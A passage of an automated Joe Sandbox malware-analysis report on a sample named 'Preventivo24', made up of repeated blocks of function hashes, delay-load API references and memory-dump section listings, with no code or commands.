                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 014aca0b1c2fbb62eedddb0a3468ee5727e751f13c0246c7b220a1913d87de83
                                                                              • Instruction ID: 3f03b0773e03830fb1fe8fc07e9637364a9d6d80adc8d5c85ab33b20a192f61f
                                                                              • Opcode Fuzzy Hash: 014aca0b1c2fbb62eedddb0a3468ee5727e751f13c0246c7b220a1913d87de83
                                                                              • Instruction Fuzzy Hash: 1AB0129235C001BD300CF1865E02D3A314CD1D0E10330802EF0D4D0140D9828C014032
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0108752D
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 4d7c9fafc2b266c3f338320e3929d53a13d3cd127360715d71054dc435e1bf0c
                                                                              • Instruction ID: 1e45f748aafe3abc73a8a6ee89afdea0e5dc9f0142f2179d5d7b4a2fc28ca35a
                                                                              • Opcode Fuzzy Hash: 4d7c9fafc2b266c3f338320e3929d53a13d3cd127360715d71054dc435e1bf0c
                                                                              • Instruction Fuzzy Hash: E4B011A22AC282BEB30CF22A2E03E3A322CC0E0E20330C00FF8C0C0208EAC00C008032
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0108752D
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: ea20d2d41101c88ece527edb8a6a8826175219d7602f72d20c79d4361539333c
                                                                              • Instruction ID: ecdeed0d1df14efc72b1126ab94945de1026ecf661b751bea8e0c30d51fd433a
                                                                              • Opcode Fuzzy Hash: ea20d2d41101c88ece527edb8a6a8826175219d7602f72d20c79d4361539333c
                                                                              • Instruction Fuzzy Hash: 08B011B22AC082BEB30CF22E2E02E3A322CC0E0E20330C00FF8C0C0208EAC00C008032
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0108752D
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 97520e22c05d2863793df0ee704fb10d6ac43a6e6527eb72c7711fde6dbd2e19
                                                                              • Instruction ID: c18ef33b7df9adfca1dbb4850f81cd5b8701f59edae65ae680952bd4c5d6183a
                                                                              • Opcode Fuzzy Hash: 97520e22c05d2863793df0ee704fb10d6ac43a6e6527eb72c7711fde6dbd2e19
                                                                              • Instruction Fuzzy Hash: 46B012A227C0416E720CF1151E02E3A312CD4D0D10330C00FF0C0C0104D5C00C404031
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0108752D
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 073384c391b7e64569b2bdfa01e0f240592affa063dc1c7bd50ac20a7fe5f3f9
                                                                              • Instruction ID: e677cbebd8a6fb9f7f8cd5d1ac0ff9422243998fabadb67f2d8d03eb45692543
                                                                              • Opcode Fuzzy Hash: 073384c391b7e64569b2bdfa01e0f240592affa063dc1c7bd50ac20a7fe5f3f9
                                                                              • Instruction Fuzzy Hash: 59B012A227C0816D724CF1151F02D3A312CC0D4D10330C00FF0C0C0104D5C10C414031
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 010875B6
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: bf5d343408547fd69951c0a59d2a0647e392ea57d13243e6c5c5877aace1c7ab
                                                                              • Instruction ID: 303d93b02914c87724be0ddf471c10f63b081f435d8e67617f2afd2413012e3b
                                                                              • Opcode Fuzzy Hash: bf5d343408547fd69951c0a59d2a0647e392ea57d13243e6c5c5877aace1c7ab
                                                                              • Instruction Fuzzy Hash: E7B0129229C1416E714CB21A2E03E3F711CC0D4D10330861EF4C0C0104D6C00C448131
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 010875B6
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 06ace2ee5e7090200fab72fa8e47acc9e8102d36cf5fd6715c5593270816b227
                                                                              • Instruction ID: c935e588d87fc4941a07f2c43f71aed19f3422d37ee0b2b4b98c04e0c4fa0790
                                                                              • Opcode Fuzzy Hash: 06ace2ee5e7090200fab72fa8e47acc9e8102d36cf5fd6715c5593270816b227
                                                                              • Instruction Fuzzy Hash: CAB0129229C0516E714CB1192F03E3F711CC0D4D10330811EF4C0C0104D6C10D058231
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 010875F5
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: bd55262bf317dd09994cce6f6ea1cad40fde7bedbad4914d7654f0923a022d84
                                                                              • Instruction ID: f6c2b174bee839a31ce9568761a9ff6e5ad4f473b536b003cff748a162f4b40f
                                                                              • Opcode Fuzzy Hash: bd55262bf317dd09994cce6f6ea1cad40fde7bedbad4914d7654f0923a022d84
                                                                              • Instruction Fuzzy Hash: 56B012D729C1C17D710CB1051E02D3E310CD0D0D20370C00EF4C0C0108D5C05C004031
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 010875F5
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 3bf14a25d767a7228129857cee27b3df414bfca03793b51c26dbb3e32ba6ee95
                                                                              • Instruction ID: 582b6af630e348cde7c27895fd026ef7e48178dc3499aae8e7d91bc285442a09
                                                                              • Opcode Fuzzy Hash: 3bf14a25d767a7228129857cee27b3df414bfca03793b51c26dbb3e32ba6ee95
                                                                              • Instruction Fuzzy Hash: E9B0129729C1C16D710CB1051E02D3E310CE0D0D20370800EF0C0C0108D6C05C004032
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 010875F5
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: c70155f2db78e14f22c68f2ad21979dc7aa1ade7d101dc637b294258c17444cb
                                                                              • Instruction ID: bda10eb72a2db8b430001cf97d709e58ef8f430a6823c33b88221e432b57c00a
                                                                              • Opcode Fuzzy Hash: c70155f2db78e14f22c68f2ad21979dc7aa1ade7d101dc637b294258c17444cb
                                                                              • Instruction Fuzzy Hash: 4AB0129729D2C16E710CB10A1E06D3F310CC0D0D20330850EF0C0C0108D9C01C804131
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 010875F5
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 2d7675de3917e10314eba1ab1ec8cded9d8e0d32ffa70bbed99735173df9b385
                                                                              • Instruction ID: 4184215116b537ed49cff56846e41bb864964390a8d3f86b435bcaba46564996
                                                                              • Opcode Fuzzy Hash: 2d7675de3917e10314eba1ab1ec8cded9d8e0d32ffa70bbed99735173df9b385
                                                                              • Instruction Fuzzy Hash: C6B012D729C1C1BE710CB1091E02D3F310CC0D0D20330C00EF4C0C0208DDC01C404131
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 010876AE
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: b3bdf7974cde06864a4121350649313ef4056dd3516072717b0c84e2b645f5e1
                                                                              • Instruction ID: 84e4794261ab045f18b7d0b13103d18b98dc812346accf666e990fd404a57ebc
                                                                              • Opcode Fuzzy Hash: b3bdf7974cde06864a4121350649313ef4056dd3516072717b0c84e2b645f5e1
                                                                              • Instruction Fuzzy Hash: 63B0129225C0216D304CB1195F02D3A710CC0D6D10330C00EF0C0D0104D5811C054071
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindCloseChangeNotification.KERNEL32(?), ref: 00E89CEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
